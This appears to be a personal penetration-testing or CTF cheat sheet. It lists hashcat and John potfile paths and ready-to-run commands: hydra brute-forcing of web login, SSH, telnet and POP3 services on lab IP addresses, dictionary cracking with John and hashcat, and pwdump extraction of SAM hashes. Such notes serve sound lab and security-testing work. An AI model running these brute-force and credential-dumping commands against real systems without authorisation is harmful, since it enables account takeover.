HASHCAT stores cracked passwords in:
/root/.hashcat/.hashcat.potfile
JOHN stores cracked passwords in:
/root/.john/john.pot
hydra -l 'admin' -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=^USER^&password=^PASS^&Login=Login:Invalid Password!"
hydra -V -I -l sunny -P '/usr/share/wordlists/rockyou.txt' 10.10.10.76 ssh -s 22022
hydra -L users.txt -P pass.txt 192.168.1.181 ssh
hydra -l root -P /root/SecLists/Passwords/10_million_password_list_top_100.txt 192.168.1.101 telnet
hydra -l boris -P /usr/share/wordlists/fasttrack.txt -f 192.168.1.140 -s 55007 pop3
john --wordlist=/usr/share/wordlists/rockyou.txt hash
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt --outfile=cracked.txt
pwdump system.old sam.old